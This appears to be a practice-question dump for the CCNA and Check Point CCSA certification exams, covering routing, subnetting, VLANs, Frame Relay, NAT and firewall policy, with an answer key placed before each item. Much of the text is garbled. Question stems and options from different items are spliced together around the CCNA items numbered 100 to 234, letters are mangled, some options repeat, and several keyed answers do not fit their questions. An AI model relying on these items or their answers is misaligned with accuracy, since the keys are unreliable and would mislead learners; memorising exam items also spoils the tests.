296 Hosts in the Sales Department are unable to access a new server at the remote office. Consider the IP addressing scheme in the accompanying graphic to determine the problem. ^A: The default gateway of the workstations in the sales department is incorrect. ^B: The subnet mask of the workstations in the sales department in incorrect. ^C: The default gateway of the server at the Remote Office is incorrect. ^D: The host address of the server at the Remote Office is invali^D: ^E: The serial 0 interface on the Home Office router and the serial 1 interface on the Remote Office router are not on the same subnetwork. ^D: Router RIP E #CCNA Q. 51 Which of the following are true? ^A: The default is to send debug output to the console screen. "^B: To view debug output from a telnet session, the ""terminal monitor"" command must be use^D:" "^C: If the ""logging buffered"" command is used, the debug output would be sent to RAM and can be viewed" "with the ""show log"" command." "^D: If the ""no console logging"" command were configured, output would be sent to a telnet session." ^E: All of the above. C #CCNA Q. 180 When you enter router password during the setup dialogue what is the difference between enable secret passwords? ^A: The enable password is encrypte^D: ^B: The enable secret password uses IPSec password authentication. ^C: The enable secret password cannot be seen as clear text when viewing the configuration. ^D: The enable secret password acts as a backup in case the enable password is compromise^D: C #CCNA Q. 3 When setting up Frame Relay for point-to-point subinterfaces, which of the following must not be ^A: The Frame Relay encapsulation on the physical interface ^B: The local DLCI on each subinterface ^C: An IP address on the physical interface ^D: The subinterface type as point-to-point B #CCNA Q. 272 What does IGRP use to determine the best path to a destination? ^A: The highest metric value. ^B: The lowest composite metric value. 
^C: The lowest hop-count and delay. ^D: The highest bandwidth and reliability ^E: The lowest administrative distance. B #CCNA Q. 36 A routing table contains static, RIP, and IGRP routes for the same destination network. Which route would normally be used to forward data? ^A: The IGRP route. ^B: The static route: ^C: The RIP route. ^D: All three will load balance. B #CCNA Q. 155 When you use the Cisco ISO command show configuration on a router, which part of the output shows the specific configured IP addresses and subnet masks? ^A: The IP host table ^B: The interfaces output ^C: Each section of the output ^D: Each section of the output ^E: The global configuration statements ^F: The section under the autonomous system number D #CCNA Q. 117 Which statement is true when a broadcast is sent in an Ethernet/802.3 LAN? ^A: The IP subnet used is 255.255.255.0 ^B: The IP address used is 255.255.255.255 ^C: The MAC address used is 00-00-00-00-00-00 ^D: The MAC address used is FF-FF-FF-FF-FF-F^F: A,B,C #CCNA Q. 200 Which three pieces of CDP information about neighboring routers are displayed on your consoleterminal? (Choose three) ^A: The neighboring routers host name ^B: The neighboring routers hardware platform ^C: Up to one address for each protocol supported ^D: Up to two addresses for each protocol supported ^E: As many addresses as are configured for each protocol supporte^D: C #CCNA Q. 24 From the DOS command prompt, you are able to ping a router but are unable to telnet it. What is the most likely cause of the problem? ^A: The PC has a bad network interface car^D: ^B: The IP address of the router is on a different subnet. ^C: No password has been set on the router vty lines. ^D: The default gateway is not set on the P^C: ^E: The IP address of the workstation is incorrect. C #CCNA Q. 262 A new host has been connected to a workgroup switch. Although its Layer 3 configuration is correct, the host is unable to access the server resources on its network segment. 
What .s the likely cause of this problem? ^A: The router lacks a routing table entry for the new host. ^B: The host switch port is assigned to the incorrect VLAN. ^C: The host MAC address is incorrectly configure^D: ^D: A VTP instance for the new host has not been installe^D: B #CCNA Q. 78 What is not a characteristic of a network segment on a switch? ^A: The segment has its own collision domain. ^B: The segment can translate from one media to a different medi^A: ^C: All devices in the segment are part of the same broadcast domain. ^D: One device per segment can currently send frames to the switch. D #CCNA Q. 123 Switching methods include cut-through, store and forwarded and a modified version of the first two methods. Which statement about switching methods is true? ^A: The stored and forward method has low latency. ^B: The cut through method and switching has high latency. ^C: The modified version holds the packet in memory until 50% of the packet reaches the switch. ^D: The modified version holds the packet in memory until the data portion of the packet reaches the switch. A,B,D #CCNA Q. 18 You need to add a new VLAN, named ACCOUNTS, to your switched network. Which of the following are true regarding configuration of this VLAN? (Choose three) ^A: The VLAN must be create^D: ^B: The VLAN must be name^D: ^C: An IP address must be configured for the ACCOUNTS VLAN. ^D: The desired ports must be added to the new VLAN: ^E: The VLAN must be added to the STP domain. A,D #CCNA Q. 270 You have a Class B network address with a subnet mask of 255.255.255.0. Which of the following statements are true regarding the resulting network? (Choose two.) ^A: There are 254 usable hosts per subnet. ^B: There is one usable network. ^C: There are 255 usable hosts per subnet. ^D: There are 254 usable subnets. ^E: There are 30 usable subnets. ^F: There are 62 usable hosts per subnet. B #CCNA Q. 309 What is the purpose of DLCIs in Frame Relay? 
^A: They determine the Frame Relay encapsulation type. ^B: They identify the logical circuit between a local router and a Frame Relay WAN switch. ^C: The represent the keepalives used to maintain the PVC in an active state. ^D: They represent the physical address of the router attached to a Frame Relay network. B,C,E #CCNA Q. 257 Which of the following are benefits of VLANs? (Choose three) ^A: They increase the size of collision domains. ^B: They allow logical grouping of users by function. ^C: They enhance network security. ^D: They increase the size of broadcast domains while decreasing the number of broadcast domains. ^E: They increase the number of broadcasts domain while decreasing their size. ^F: The simplify switch administration. D #CCNA Q. 250 What is the purpose of ISL and 802.lq frame tagging? ^A: They provide best path determination. ^B: The allow the exchange of filtering tables. ^C: They specify different implementation of the Spanning-Tree Protocol. ^D: They provide interswitch VLAN communication. D,E #CCNA Q. 152 What are two functions of ICMP protocol? (Choose Two) ^A: To map IP addresses to Ethernet addresses ^B: To map common names to network addresses ^C: To forward SNMP alerts to management consoles ^D: To generate an echo reply in response to a ping test ^E: To send a host or post unreachable message from a router to the source of an undeliverable packet B #CCNA Q. 128 What is a key use of a device hardware address? ^A: To obtain a vendor code/serial number from the user. ^B: To transmit a frame from one interface to another interface ^C: To transmit a packet from one local device to another local device. ^D: To transmit data from one local device to remote device across Internet. ^E: To contain logical information about a device to use an end-to-end transmission. C #CCNA Q. 251 What is the purpose of Spanning-Tree in a switched LAN? ^A: To provide a mechanism for network monitoring in switched environments. 
^B: To prevent routing loops in networks with redundant paths. ^C: To prevent routing switching loops in networks with redundant switched paths. ^D: To manage, the addition, deletion, and naming of VLANs across multiple switches. ^E: To segment a network into multiple collision domains. B,E #CCNA Q. 294 Which of the following are reasons to use a bridge to segment a network? (Choose two.) ^A: To reduce broadcasts within collisions domains. ^B: To reduce collisions within broadcasts domain. ^C: To increase the number of broadcasts domains. ^D: To increase the broadcasts within collisions domains. ^E: To increase the number of collision domains. ^F: To increase the efficiency of routin^G: A,C #CCNA Q. 225 What are two purposes for using switches? (Choose two) ^A: To reduce collisions ^B: To increase collisions ^C: To increase the number of collision domains ^D: To decrease the number of collision domains ^E: To decrease the number of broadcast domains A,C #CCNA Q. 115 What are two purposes of segmenting a network with a bridge? (Choose two) ^A: To reduce collisions. ^B: To increase collisions. ^C: To add collision domains. ^D: To reduce collision domains. ^E: To have more broadcast domains. A,C,D,F #CCNA Q. 281 What are possible causes of LAN traffic congestion? (Choose four.) ^A: Too many hosts in a broadcast domain. ^B: Full Duplex operation. ^C: Broadcast storms. ^D: Multicastin^G: ^E: Segmentation. ^F: Low bandwidth. C #CCNA Q. 29 If windows size is changed from 3000 to 4000 during the data transfer stage of a TCP session, what can a sending host do? ^A: Transmit 3000 bytes before waiting for an acknowledgement. ^B: Transmit 4000 packets before waiting for an acknowledgement. ^C: Transmit 4000 bytes before waiting for an acknowledgement. ^D: Transmit 4000 segments before waiting for an acknowledgement. ^E: Transmit 3000 frames before waiting for an acknowledgement. A #CCNA Q. 203 The ICMP (referred to in RFC 1700) is implemented by all TCP/IP hosts? 
^A: TRUE ^B: FALSE A #CCNA Q. 204 IPX traffic using different encapsulation types can go over the same datalink. ^A: TRUE ^B: FALSE D #CCNA Q. 182 How do you get help on a command after you have received - % INCOMPLETE COMMAND' response from a switch CLI? ^A: Type -history- to review the prompt before the error. ^B: Enter a question mark to display all console commands ^C: Type \ldblquote help\rdblquote followed by the command to see the command parameter ^D: Re enter the command followed by question mark to view key words A,B #CCNA Q. 209 In which two modes can the ICMP ping command be used? (Choose two) ^A: User ^B: Privileged ^C: Global Configuration ^D: Interface Configuration A #CCNA Q. 280 Question on PPP authentication. We have two Cisco routers with the hostnames Router1 and Router2. Router1 uses username Router2 and password PassRouter1. How would you set the username and password on Router2 for PPP authentication between Router1 and Router2? ^A: Username Router1 password PassRouter1 ^B: Username Router2 password PassRouter1 ^C: Username Router1 password PassRouter2 ^D: Username Router2 password PassRouter2 A #CCNA Q. 68 A router on one side of a PPP link uses the host name RTR1 and the password CORP1-PWD. Which configuration line on RTR1 enables the connection between RTR1 and other router named RTR2? ^A: Username RTR2 password CORP1-PWD ^B: Username RTR1 password CORP1-PWD ^C: Username RTR2 password CORP2-PWD ^D: Username RTR1 password CORP2-PWD B #CCNA Q. 220 What was the key reason the International Organization for Standardization released the OSI model? ^A: Users could access network server faster. ^B: Different vendors networks could work with each other. ^C: The industry could create a standard for how computers work. ^D: The network administrator could increase the overall speed of their network. D #CCNA Q. 124 Which technology do catalyst switches use to resolve topology loops and ensure data use flows properly through a single network path? 
^A: Virtual LANs. ^B: Frame filterin^G: ^C: Cut through switchin^G: ^D: Spanning tree protocol. C,D,E,F #CCNA Q. 121 What are 4 ways network management can be simplified by using the virtual LANs (VLANs)? (Choose four) ^A: VLANs allow you to implement multiple layers switching easily. ^B: VLAN can group several broadcasts domains into multiple logical subnets. ^C: It is no longer necessary to install cables to move a user from a new network to another. ^D: Network adds, moves and changes are achieved by configuring a port into a VLAN. ^E: A group of users needing high security can be put into a VLAN so that no users outside the VLANs can communicate with them. ^F: As a logical grouping of users, VLANs can be considered independent from their physical or geographic locations. A,E,F #CCNA Q. 61 In which three situations is a hold-down timer reset? (Choose three:) ^A: When the hold-down timer expires. ^B: When infinity is finally defined as some maximum number. ^C: When the router exchanges update summaries at area borders. ^D: When the router detect faulty LSPs propagating through the internetwork. ^E: When another update is received indicating a new route with a better metri^C: ^F: When another update is received indicating the original route to the network has been restore^D: ^G: When the router receives a processing task proportional to the number of links in the internetwork. A #CCNA Q. 77 Which statement is true? ^A: While bridges are used to segment networks they will not isolate broadcast or multicast packets. ^B: A bridge looks at every packet with in its network segment and works like a hub, rebroadcasting the packet if the destination is with in its network segment. ^C: A bridge maintains a table of the IP addresses of the hosts with in its network segment and forwards the packet directly to the destination based upon the IP address. 
^D: Bridge resets the hop count by keeping all packets within the network segment only packets addressed to its specific destination host outside the network segment are allowed to pass through the bridge.: A #CCNA Q. 187 Which statement about half-duplex Ethernet operation is true? ^A: With half duplex transmission frames feed into a single cable in one direction at a time. ^B: Half duplex transmission between stations is achieved by using point-to-point Ethernet and fast Ethernet connection. ^C: Half duplex transmission between stations is achieved by using point to multi point Ethernet and fast Ethernet connection. ^D: Half duplex Ethernet technology provides a transmit circuit connection wired directly to the receiver circuit at the other end of the connection. C #CCNA Q. 297 Company ABC has just added an employee workstation to its network. The employee is unable to connect to the server at IP address 192.168.10.98/27. Identify the incorrectly configured network parameter. ^A: workstation IP address. ^B: workstation subnet mask. ^C: workstation default gateway. ^D: router interface E0 IP address. D #CCNA Q. 278 Which WAN technology was designed to work over traditional phone lines and provide small offices and user with higher speed digital dial-up service? ^A:frame relay . x.25 ^C: ATM ^D: ISDN B,F #CCNA Q. 34 Given the following routing table entry, which of the following are used by default in the calculation of the number 1200? (Choose two.) 172.16.0.0 [100/1200] via 192.168.16.3, 00:00:55, Ethernet1 ^A: MTU ^B: bandwidth ^C: administrative distance ^D: hop count ^F: delay A #CCNA Q. 73 Which statement about the specialized IP addresses shown in the EXHIBIT is true? EXHIBIT: 10.0.0.0 to 10.255.255.255 172.16.0.0 to 172.31.255.255 192.168.0.0 to 192.168.255.255 ^A: They are private IP addresses. ^B: They can not be leased with DHCP. ^C: They are allocated for VOL PVOLP. ^D: They represent IP classless addresses. 
^E: They are used by the inter NIC for administration. C #CCNA Q. 136 Given the following IP address from the Class B address range: 172.35.21.12 Your network plan requires no more than 126 hosts on a subnet that includes this address. When you configure the IP address in Cisco IOS software, which value should you use as the subnet mask? ^A: 255.255.0.0 ^B: 255.255.128.0 ^C: 255.255.255.128 ^D: 255.255.255.252 A #CCNA Q. 197 Company XYZ has an employee that works out of the home. The employee runs big client-server applications and must quickly transfer large files. The company wants the best cost/benefit on this connection. What would be the most practical solution? ^A: An ISDN basic rate interface (BRI) connection to the users home . ^B: A dedicated T1 connection to the users home. ^C: A dedicated Frame Relay connection to the users home. ^D: A standard 28.8 analogue dial up connection to the users home D #CCNA Q. 193 Given the following criteria for granting access from a remote site to your LAN : restrict access on interface E0 E0=128.12.22.55 Deny access to telnet, FTP All other types of operations. Which line should come last in configuring your access list? ^A: Access-List 101 ^B: Access-List 101 deny E0 telnet FTP ^C: Access list 101 allow all except FTP telnet ^D: Access list 101 permit IP 0.0.0.0 255.255.255.255 any E #CCNA Q. 163 Which line from a show spantree one-command output indicates that Virtual LAN1 (VLAN1) is functioning properly? ^A: Root mode is fast Ethernet 0/26. ^B: Port Ethernet 0/1 of VLAN is forwardin^G: ^C: Designated port in Ethernet 0/1 path cos10. ^D: Designated root has priority 0, address 0000.588fb600 ^E: VLAN1 is executing the IEEE compatible spanning tree protocol. B #CCNA Q. 221 Each department has its own file server and the company has an enterprise server that is shared by all departments. What does a network administrator use to provide a secure separation between the management and sales department? 
^A: Bridge between management and sites. ^B: Routers to provide the most secure segmentation. ^C: A hub to provide the ease of management and a satisfactory alternative for the network security. ^D: An Ethernet switch to secure separation through programming the access list of each port of the switch. D #CCNA Q. 153 Novell IPX network addresses have two configurable parts. The network administrator specifies the IPX network number. How is the node number determined? ^A: It is the serial number of the given device. ^B: It is assigned as a lease by Novell DHCP. ^C: It is also set by the network administrator. ^D: It is usually the MAC address of one interface. ^E: It is downloaded by NetWare Core Protocol (NCP). B #CCNA Q. 30 Users on network 192.168.69.0/28 are complaining that they cannot access the corporate intranet server at www.inhouse:com. In troubleshooting this problem, you find that you are able to telnet a workstation on this network to the internal webserver via its IP address. What is the likely cause of this problem? Other divisions in the company use applications that require less than 2 Mbps bandwidth of the enterprise server ^A: TCP/IP failure ^B: DNS failure ^C: FTP failure C #CCNA Q. 100 On a network design project you determine that a new testing application requires multiple hosts. These hosts must be capable of sharing data between each host and an enterprise server at 10 Mbps bandwidth. system image that is run in Flash? ^A: Copy flash tftp What is your economical recommendation? ^A: That the existing 10BaseT hub be replaced with 100BaseT hub to improve overall performance. ^B: That a router can separate the testing application from the rest of the network thus allowing the testing application more bandwidth. ^C: That the switch be installed so that enterprise server can be provided a 100 Mbps port and each of the testing application hosts can be given dedicated 10 Mbps ports. A #CCNA Q. 
178 Which command should you use to configure a router so that it can become a TFTP host for router transmission session on the other device are successful. What is the default that you must enter to suspend your Telnet session and return to the original router? ^B: Config tftp server ^C: Write network ^D: Tftp-server system ^E: Setup server tftp E #CCNA Q. 166 While you are preparing the initial configuration of your router and enable IP you find that you need to use a telnet session to check for a network address parameter. Your telnet logging and your virtual Which layer of the protocol stack is the network administrator using for this operation? ^A: application ^A: Suspend ^B: The command exit ^C: CTRL \endash ESC followed by x ^D: CTRL \endash ALT \endash DEL followed b ESC ^E: CTRL- Shift-6 followed by x A #CCNA Q. 243 A network administrator is verifying the configuration of a newly installed host by establishing an ftp connection to a remote server. Which of the following are required to allow remote management of the switch over IP? (Choose two.) ^A: The Frame Relay encapsulation on the physical interface. ^B: presentation ^C: session ^D: transport ^E: data link ^F: internet C #CCNA Q. 234 You are configuring a new catalyst switch that you want to manage remotely from workstations on other network segment within your enterprise. you configure for 5 bits of subnetting when you configure for this in the Cisco IOS software. Which subnet mask should you use? ^B: The local DLCI on each subinterface. ^C: An IP address on the physical interface. ^D: The subinterface type as point-to-point D #CCNA Q. 219 Given the following IP address from the class C address range 192.168.21.12 your network plan needs addresses for twenty-eight small offices. Each office uses its own subnet. The network designs specify that ^A: 255.255.0.28 ^B: 255.255.255.0 ^C: 255.255.255.28 ^D: 255.255.255.248 ^E: 255.255.255.252 4ad1.021f.2cfe.8322 #CCNA Q. 
39: A host with a MAC address of 021f.2cfe.8322 is to be inserted into IPX network 4ad1. Enter the IPX address for this host. 255.255.255.224 #CCNA Q. 264 A small enterprise has a class C network license The enterprise requires five usable subnets, each capable of accommodating at least 18 hosts. Enter the appropriate subnet mask below. 255.255.255.224 #CCNA Q. 311 A small enterprise has class C network license The enterprise requires 5 usable subnets, each capable of accommodating at least 18 hosts. Enter the appropriate subnet mask below. router rip #CCNA Q. 232 Enter the command to start IP, RIP version1 routing on a Cisco router? DECIMAL:170 HEXADECIMAL:AA #CCNA Q.315 What is the decimal and hexadecimal equivalent of the binary number 10101010? D #CCNA Q. 1: Your Ethernet network, 172.30.1.0, shuts down. Which update message is seen in your router's debug ip rip output regarding that network?^A: subnet 172.30.1.0,metric 0 ^B: subnet 172.30.1.0, metric 1 ^C: subnet 172.30.1.0, metric 15 ^D: subnet 172.30.1.0, metric A #CCSA Q1. The VPN1 NG User Interface consists of which of the following elements? ^A. Security Policy Editor, Visual Policy Editor and Object tree view. ^B. Management Server and VPN1 Module. ^C. Visual Policy Editor, Object Tree view and inspection Module. ^D. Security Policy Server, System GUI and Module Log Viewer. ^E. VPN1 Module, Inspection Module and Security Server. A #CCSA Q3. As a VPN1 administrator, you have an undistributed range of IP addresses for which you want to perform address translation. You can simplify your efforts through the use of ADDRESS RANGE. ^A. True ^B. False D #CCSA Q5. You are working with multiple firewalls that have extensive Rule Bases. To simplify administration task, which of the following should you choose to do? ^A. Create Network range objects that restrict all applicable rules to only certain networks. ^B. Run separate GUI clients for external and internal firewalls. ^C. 
Eliminate all possible contradictory rules such as stealth and clean-up rules. ^D. Save a different Rule Base for each remote firewall. ^E. None of the above. B #CCSA Q6. Currently, the Accounting Department is FTP-ing a file in the bank. Which Log Viewer Module would show you the activity occurring at the present time? ^A. Security Log. ^B. Active Connections Log. ^C. Accounting Log. ^D. Administrative Log. ^E. None of the above. A #CCSA Q7. With Blocking Scope default settings, a selected connection is terminated: ^A. And all further attempts to establish a connection from the same source IP address to the same destination IP address and port will be blocked. ^B. But all further attempts to establish connections from this specific source IP address will be authenticated before being denied. ^C. And all further attempts to establish connections to this specific destination IP address will be denied. ^D. And all further attempts to establish a connection from the same source IP address to the firewall's IP address will be blocked. ^E. Both A and D. C #CCSA Q11. Changes made to the Security Policy do not take effect on the Enforcement Module until the administrator performs which of the following actions? ^A. Saves the policy. ^B. Verifies the policy. ^C. Installs the policy. ^D. Stops firewall services on the Enforcement Module. ^E. Stops firewall services on the Management module. A #CCSA Q13. The fw fetch command performs the following function: ^A. Attempts to fetch the policy from the Management Server. ^B. Fetches users from the Management server. ^C. Produces an output screen of the Rule Base. ^D. Fetches the logs. ^E. Fetches the systems status. E #CCSA Q14. Inclement weather and a UPS-failure cause a firewall to reboot. ^ Earlier that day a tornado destroyed the building where the firewall's Management Module was located. ^ The Management Module was not recovered and has not been replaced. ^ Based on the scenario, which of the following statements is FALSE? 
^A. The firewall will continue to enforce the last rule base installed. ^B. The firewall will log locally. ^C. The firewall will fetch the last installed policy from local host and install it. ^D. Communication between the firewall and the replacement Management Module must be established before the replacement Management Module can install a policy on the firewall. ^E. Because the firewall cannot contact the Management Module, no policy will be installed. C #CCSA Q15. When configuring Anti1 NG on the firewall interfaces, all of the following are valid address choices except: ^A. Network defined by Interface IP and Net Mask. ^B. Not Defined. ^C. Security Policy Installed. ^D. Specific ^E. None of the above. C #CCSA Q17. Assume that you are working on a Windows NT operating system. What is the default expiration for a Dynamic NAT connection NOT showing any UDP activity? ^A. 30 Seconds. ^B. 60 Seconds. ^C. 40 Seconds. ^D. 600 Seconds. ^E. 3000 Seconds. B #CCSA Q18. Assume there has been no change made to default policy properties. ^ To allow a telnet connection into your network, you must create two rules. ^ - One to allow the initial Telnet connection in. ^ - One to allow the destination machine to send information back to the client. ^A. True ^B. False E #CCSA Q19. In Windows NT to force log entries other than the default directory. ^A. You must use the cpconfig command. ^B. Change the fwlog environment variable. ^C. Modify the registry. ^D. Change the directory in log viewer. ^E. Use the fw log switch command. A #CCSA Q20. For most installations, the Clean-Up rule should be the last rule in Rule Base. ^A. True ^B. False B #CCSA Q21. What complements are necessary for VPNmail, passing through the firewall, for macro viruses? ^A. UFP and OPSEC-certified scanning product. ^B. CVP and OPSEC-certified virus scanning product. ^C. UFP and CVP. ^D. UFP, CVP and OPSEC-certified content filter. ^E. None of the above, VPN1 NG scans for macro viruses by default. C #CCSA Q22. 
Why would you want to verify a Security Policy before installation? ^A. To install Security Policy cleanly. ^B. To check up the enforcement-point firewall for errors. ^C. To identify conflicting rules in your Security Policy. ^D. To compress the Rule Base for faster installation ^E. There is no benefit verifying a Security Policy before installing it. B #CCSA Q23. To completely set up Static NAT, you ONLY have to select Add Automatic Address Translation rules on the NAT tab, and specify a public NAT IP address. ^A. True ^B. False B #CCSA Q24. If you configure the Minutes interval for a firewall in the User Authentication session timeout box, as shown below on the Authentication Tab of the Workstations properties window, users of one time password must re-authenticate for each request during this time period. ^A. True ^B. False D #CCSA Q25. What does a status of Untrusted tell you? ^A. A VPN1 NG firewall module has been compromised. ^B. A gateway cannot be reached. ^C. A module is installed and responding to status checks, but the status is problematic. ^D. A gateway is connected, but the management module is not the master of the module installed on the gateway. ^E. None of the above. D #CCSA Q29. How do you recover communications between your management module and enforcement module if you lock yourself out via a rule policy that is configured incorrectly? ^A. Cp delete all all. ^B. Cp pause all all. ^C. Cp stop all all. ^D. Cp unload all all. ^E. Cp push all all. C #CCSA Q30. You have set up a firewall and management module on one NT box and a remote module on a different location. ^ You receive only sporadic logs from the local firewall and only and control message from remote firewall. ^ All rules on both firewalls are logging and you know the traffic is flowing through the firewall using these rules. ^ All the firewall related services are running and you are using NAT and you receive few logs from the local firewall. 
^ What actions from the choices below would you perform to find out why you cannot see logs? ^A. Make sure there is no masters file in SFWDIR/conf on the remote module. ^B. Make sure there is no masters file in SFWDIR/conf on the local NT box. ^C. See if you can do a fwfetch from the module. ^D. Run the fw logexport n from the command line prompt on the remote module. ^E. Use pulist.exe from the Windows NT resource kit. B #CCSA Q31. As a firewall administrator you encounter the following error message: "Authentication for command failed." ^ What is the most logical reasoning for this type of error message? ^A. The Rule Base has been corrupted. ^B. The kernel cannot communicate with the management module. ^C. The administrator does not have the ability to push the policy. ^D. Remote encryption keys cannot be fetched. ^E. Client authentication has failed. A #CCSA Q32. Your customer has created a rule so that every time a user wants to go to the Internet, that user must be authenticated. ^ Firewall load is a concern for the customer. ^ Which authentication method does not result in any additional connections to the firewall? ^A. Session ^B. User ^C. Client ^D. Connection ^E. None of the above. D #CCSA Q33. What variable is used to extend the interval of the Timeout in a NAT to prevent a hidden UDP connection from losing its port? ^A. Fwx_udp_todefaultextend. ^B. Fwx_udp_expdefaultextend. ^C. Fwx_udp_todefaultext ^D. Fwx_udp_timeout. ^E. Fwx_udp_expiration. D #CCSA Q34. To hide a data field in the log viewer: ^A. Select Hide from the Log Viewer menu. ^B. Right-click anywhere in a column of the Log Viewer GUI and select Show Details. ^C. Right-click anywhere in the column of the Log Viewer GUI and select Disable. ^D. Right-click anywhere in the column of the Log Viewer GUI and select Hide. ^E. Select Hide from the Log Viewer tool bar. D #CCSA Q35. You are following the procedure to set up user authentication for TELNET to prompt for a distinct destination. 
^ This allows the firewall to simulate a TELNET Proxy. ^ After you defined the user on the Firewall and use VPN1 Authentication, you would: ^A. Stop the Firewall. ^B. Restart the Firewall. ^C. Start the Policy Editor and go to Manage service, and edit TELNET service. ^D. Ensure that the Authentication method is enabled in the firewall object. ^E. Ensure that there are no existing rules already allowing TELNET. E #CCSA Q37. What is the software package through which all Check Point products use infrastructure services? ^A. Cpstart/cpstop. ^B. Check Point Registry. ^C. CPD ^D. Watch Dog for critical services. ^E. SVN Foundation. A #CCSA Q38. Choose the BEST response to finish this statement. ^ A Firewall: ^A. Prevents unauthorized access to or from a secured network. ^B. Prevents unauthorized access to or from an unsecured network. ^C. Prevents authorized access to or from an Intranet. ^D. Prevents authorized access to or from an Internet. ^E. Prevents macro viruses from infecting the network. E #CCSA Q39. Where is the external if file located in VPN1/Firewall-1 NG? ^A. FWDIR conf directory. ^B. Database directory. ^C. State directory. ^D. Temp Directory. ^E. Not used in VPN1/Firewall-1 NG. E #CCSA Q40. Which log viewer mode allows you to actually see the contents of the files HTTP-ed by the corporation's Chief Executive Officer? ^A. Security Log. ^B. Active Connections Log. ^C. Accounting Log. ^D. Administrative Log. ^E. None of the above. E #CCSA Q41. When you select the alert radio button on the topology tab of the interface properties window: ^A. The action specified in the Action element of the Rule Base is taken. ^B. The action specified in the Anti-Spoofing Alert field in the Global properties window is taken. ^C. The action specified in the Pop up Alert Command in the Global properties window is taken. ^D. Both A and B. ^E. Both B and C. D #CCSA Q42. You are the firewall administrator with one management server managing one firewall. 
The system status displays a computer icon with a '!' symbol in the status column. ^ Which of the following is the most likely cause? ^A. The destination object has been defined as external. ^B. The Rule Base is unable to resolve the IP address. ^C. The firewall has been halted. ^D. The firewall is unprotected, no security policy is loaded. ^E. Nothing is wrong. B #CCSA Q43. System Administrators use session authentication when they want users to: ^A. Authenticate each time they use a supported service. ^B. Authenticate all services. ^C. Use only TELNET, FTP, RLOGIN, and HTTP services. ^D. Authenticate once, and then be able to use any service until logging off. ^E. Both B and D B #CCSA Q44. Your customer has created a rule so that every time a user wants to go to the Internet, that user must be authenticated. ^ The customer requires an authentication scheme that provides transparency for the user and granular control for the administrator. ^ Users must also be able to log in from any location. ^ Based on this information, which authentication scheme meets the customer's needs? ^A. Session ^B. User ^C. Client ^D. Dual ^E. Reverse B #CCSA Q45. Implementing Dynamic NAT would enable an internal machine behind the firewall to act as an FTP Server for external clients. ^A. True ^B. False E #CCSA Q46. The Enforcement Module (part of the VPN1 Module): ^A. Examines all communications according to an Enterprise Security Policy. ^B. Is installed on a host enforcement point. ^C. Can provide authentication and Content Security features at the application level. ^D. Is usually installed on a multi-homed machine. ^E. All of the above. C #CCSA Q47. In most cases when you are building the Rule Base you should place the Stealth Rule above all other rules except: ^A. Clean up rules. ^B. Implicit Rules. ^C. Client Authentication Rules. ^D. Pseudo Rules. ^E. Default Rules. A #CCSA Q48. 
If you change the inspection order of any of the implied rules under the Security Policy Setup, does it change the order in which the rules are enforced? ^A. True ^B. False A #CCSA Q49. The fw fetch command allows an administrator to specify which Security Policy a remote enforcement module retrieves. ^A. True ^B. False B #CCSA Q50. You can edit VPE objects before they are actualized (translated from virtual network objects to real). ^A. True ^B. False. E #CCSA Q51. Stateful inspection is a firewall technology introduced in Checkpoint VPN1 software. It is designed to meet which of the following security requirements? ^ 1. Scan information from all layers in the packet. ^ 2. Save state information derived from previous communications, such as the outgoing Port command of an FTP session, so that incoming data communication can be verified against it. ^ 3. Allow state information derived from other applications access through the firewall for authorized services only, such as previously authenticated users. ^ 4. Evaluate and manipulate flexible expressions based on communication and application derived state information. ^A. 1, 2, 3 ^B. 1, 3, 4 ^C. 1, 2, 4 ^D. 2, 3, 4 ^E. 1, 2, 3, 4 A #CCSA Q52. If the security policy editor or system status GUI is open, you can open the log viewer GUI from the window menu. ^A. True ^B. False D #CCSA Q53. NAT can NOT be configured on which of the objects? ^A. Hosts ^B. Gateways ^C. Networks ^D. Users ^E. Routers C #CCSA Q54. Your customer has created a rule so that every time a user wants to go to the Internet, that user must be authenticated. ^ Which is the best method of authentication for users who must use specific computers for Internet access? ^A. Session ^B. User ^C. Client ^D. Connection ^E. None of the above. B #CCSA Q55. Which of the following describes the behavior of VPN1 NG? ^A. Traffic not expressly prohibited is permitted. ^B. Traffic not expressly permitted is prohibited. ^C. TELNET, SMTP and HTTP are allowed by default. ^D. 
Secure connections are authorized by default, unsecured connections are not. ^E. All traffic is controlled by explicit rules. E #CCSA Q56. New users are created from templates. What is the name of the standard template from which you would create a new user? ^A. New ^B. User ^C. Group ^D. Standard User. ^E. Default B #CCSA Q57. In a distributed management environment, the firewall administrator has removed the default check from Accept VPN1 control connections under the Security Policy tab of the properties setup dialogue box. ^ In order for the management module and the Firewall to communicate, you must create a rule to allow the Management Module to communicate to the firewall on which port? ^A. 80 ^B. 256 ^C. 259 ^D. 900 ^E. 23 B #CCSA Q58. What is the command for installing a Security Policy from a *.W file? ^A. Fw gen and then the name of the .W file. ^B. Fw load and then the name of .W file. ^C. Fw regen and then the name of the .W file. ^D. Fw reload and then the directory location of the .W file. ^E. Fw import and then the name of the .W file. B #CCSA Q59. In the Check Point Configuration Tool, you create a GUI administrator with Read Only privileges. ^ This allows the Firewall-1 administrator for the authorized GUI client (GUI workstation) privileges to change network objects, and create and install rules. ^A. True ^B. False D #CCSA Q60. Hybrid Authentication allows VPN1 NG to authenticate SecuRemote/SecureClient, using which of the following? ^A. RADIUS ^B. 3DES ^C. TACACS ^D. Any authentication method supported by VPN1. ^E. Both A and C. E #CCSA Q61. In order to install a new Security Policy on a remote firewall, what command must be issued on the remote firewall? ^A. Fw unload all all. ^B. Fw load new. ^C. Cp clear policy. ^D. None of the above, the command cp policy remove is issued from the manager. ^E. None of the above, the new policy will automatically overwrite the existing policy. A #CCSA Q62. 
As a firewall administrator, if you want to log packets dropped by "implicit drop anything not covered" rules, you must explicitly define a Clean-up rule. This must be the last rule in the rule base. ^A. True ^B. False A #CCSA Q63. Fully Automatic Client authentication provides authentication for all protocols, whether supported by these protocols or not. ^A. True ^B. False B #CCSA Q64. VPN1 NG differs from Packet filtering and Application Layer Gateways, because? ^A. VPN1 NG provides only minimal logging and alerting mechanism. ^B. VPN1 NG uses Stateful inspection which allows packet to be examined at the top of the layers of the OSI model. ^C. VPN1 NG has access to a limited part of the packet header only. ^D. VPN1 NG requires a connection from a client to a firewall and firewall to a server. ^E. VPN1 NG has access to packets passing through key locations in a network. A #CCSA Q65. AlphaBravo Corp has 72 privately addressed internal addresses. Each network is a piece of the 10-net subnetted to a class C address. ^ AlphaBravo uses Dynamic NAT and hides all of the internal networks behind the external IP addresses of the Fire C #CCSA Q66. How does VPN1 NG implement Transparent authentication? ^A. Unknown users receive error messages indicating that the firewalled gateway does not know the user names on the gateway. ^B. VPN1 NG prompts for user names even though the authentication data may not be 